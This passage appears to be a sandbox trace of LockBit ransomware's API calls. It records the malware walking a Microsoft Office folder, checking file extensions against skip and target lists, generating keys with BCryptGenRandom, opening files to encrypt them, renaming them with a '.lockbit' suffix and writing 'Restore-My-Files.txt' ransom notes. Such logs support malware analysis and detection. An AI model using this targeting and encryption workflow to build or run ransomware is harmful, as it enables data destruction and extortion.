(lpString1=".ico", lpString2=".GIF") returned 1 [0203.918] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.918] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.918] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.918] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD15061_.GIF") returned 1 [0203.918] lstrcmpiW (lpString1="ntldr", lpString2="BD15061_.GIF") returned 1 [0203.918] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD15061_.GIF") returned 1 [0203.918] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD15061_.GIF") returned 1 [0203.918] lstrcmpiW (lpString1="autorun.inf", lpString2="BD15061_.GIF") returned -1 [0203.918] lstrcmpiW (lpString1="thumbs.db", lpString2="BD15061_.GIF") returned 1 [0203.918] lstrcmpiW (lpString1="iconcache.db", lpString2="BD15061_.GIF") returned 1 [0203.918] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.918] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15061_.GIF") returned=".GIF" [0203.918] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.918] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.919] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.919] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.919] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.919] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.919] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.919] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.919] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.919] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.919] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.919] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.919] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.919] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.919] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.919] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.919] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.919] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.919] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.919] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.919] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.919] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.919] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.919] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.919] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.919] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.919] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.919] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.919] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15061_.GIF.lockbit") returned 78 [0203.919] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15061_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd15061_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.921] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.921] malloc (_Size=0x40068) returned 0x3df0008 [0203.921] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=119) returned 1 [0203.921] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.921] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.921] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.921] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.922] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.922] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.922] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.925] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15061_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15061_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.925] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.925] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.925] free (_Block=0x1fa2ed8) [0203.925] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15061_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.925] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.925] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.925] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbfac9e00, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbcacf0c0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbfac9e00, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0xb9, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD15132_.GIF", cAlternateFileName="")) returned 1 [0203.926] lstrcmpiW (lpString1=".", lpString2="BD15132_.GIF") returned -1 [0203.926] lstrcmpiW (lpString1="..", lpString2="BD15132_.GIF") returned -1 [0203.926] PathFindExtensionW (pszPath="BD15132_.GIF") returned=".GIF" [0203.926] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.926] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.926] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.926] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.926] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.926] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.926] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.926] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.926] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.926] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.926] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.926] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.926] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.926] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.926] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.926] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.926] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.926] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.926] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.926] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.926] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.926] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.926] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.926] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.926] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.926] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.926] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.926] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.926] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.926] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.926] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.926] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.927] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.927] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.927] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.927] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.927] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.927] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.927] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.927] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.927] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.927] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.927] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.927] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.927] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.927] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.927] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.927] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD15132_.GIF") returned 1 [0203.927] lstrcmpiW (lpString1="ntldr", lpString2="BD15132_.GIF") returned 1 [0203.927] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD15132_.GIF") returned 1 [0203.927] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD15132_.GIF") returned 1 [0203.927] lstrcmpiW (lpString1="autorun.inf", lpString2="BD15132_.GIF") returned -1 [0203.927] lstrcmpiW (lpString1="thumbs.db", lpString2="BD15132_.GIF") returned 1 [0203.927] lstrcmpiW (lpString1="iconcache.db", lpString2="BD15132_.GIF") returned 1 [0203.927] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.927] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15132_.GIF") returned=".GIF" [0203.927] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.927] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.927] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.927] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.927] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.927] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.927] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.927] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.927] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.928] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.928] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.928] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.928] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.928] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.928] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.928] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.928] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.928] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.928] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.928] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.928] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.928] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.928] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.928] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.928] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.928] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.928] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.928] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.928] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15132_.GIF.lockbit") returned 78 [0203.928] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15132_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd15132_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.930] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.930] malloc (_Size=0x40068) returned 0x3df0008 [0203.930] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=185) returned 1 [0203.930] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.931] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.931] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.931] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.931] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.931] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.931] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.934] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15132_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15132_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.934] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.934] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.934] free (_Block=0x1fa2ed8) [0203.934] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15132_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.934] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.934] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.934] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0ddcb00, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbcacf0c0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xc0ddcb00, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0xb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD15133_.GIF", cAlternateFileName="")) returned 1 [0203.934] lstrcmpiW (lpString1=".", lpString2="BD15133_.GIF") returned -1 [0203.934] lstrcmpiW (lpString1="..", lpString2="BD15133_.GIF") returned -1 [0203.935] PathFindExtensionW (pszPath="BD15133_.GIF") returned=".GIF" [0203.935] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.935] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.935] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.935] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.935] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.935] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.935] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.935] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.935] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.935] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.935] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.935] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.935] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.935] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.935] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.935] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.935] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.935] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.935] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.935] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.935] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.935] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.935] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.935] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.935] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.935] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.935] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.935] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.935] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.935] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.935] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.935] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.935] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.935] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.936] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.936] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.936] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.936] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.936] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.936] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.936] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.936] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.936] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.936] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.936] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.936] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.936] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.936] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD15133_.GIF") returned 1 [0203.936] lstrcmpiW (lpString1="ntldr", lpString2="BD15133_.GIF") returned 1 [0203.936] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD15133_.GIF") returned 1 [0203.936] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD15133_.GIF") returned 1 [0203.936] lstrcmpiW (lpString1="autorun.inf", lpString2="BD15133_.GIF") returned -1 [0203.936] lstrcmpiW (lpString1="thumbs.db", lpString2="BD15133_.GIF") returned 1 [0203.936] lstrcmpiW (lpString1="iconcache.db", lpString2="BD15133_.GIF") returned 1 [0203.936] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.936] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15133_.GIF") returned=".GIF" [0203.936] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.936] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.936] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.936] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.936] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.936] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.936] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.936] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.936] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.936] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.936] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.936] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.936] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.936] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.937] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.937] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.937] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.937] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.937] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.937] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.937] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.937] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.937] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.937] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.937] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.937] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.937] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.937] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.937] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15133_.GIF.lockbit") returned 78 [0203.937] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15133_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd15133_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.938] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.938] malloc (_Size=0x40068) returned 0x3df0008 [0203.938] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=176) returned 1 [0203.938] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.939] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.939] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.939] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.939] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.939] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.939] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.941] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15133_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15133_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.942] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.942] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.942] free (_Block=0x1fa2ed8) [0203.942] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15133_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.942] wsprintfW (in: param_1=0x3d6a878, 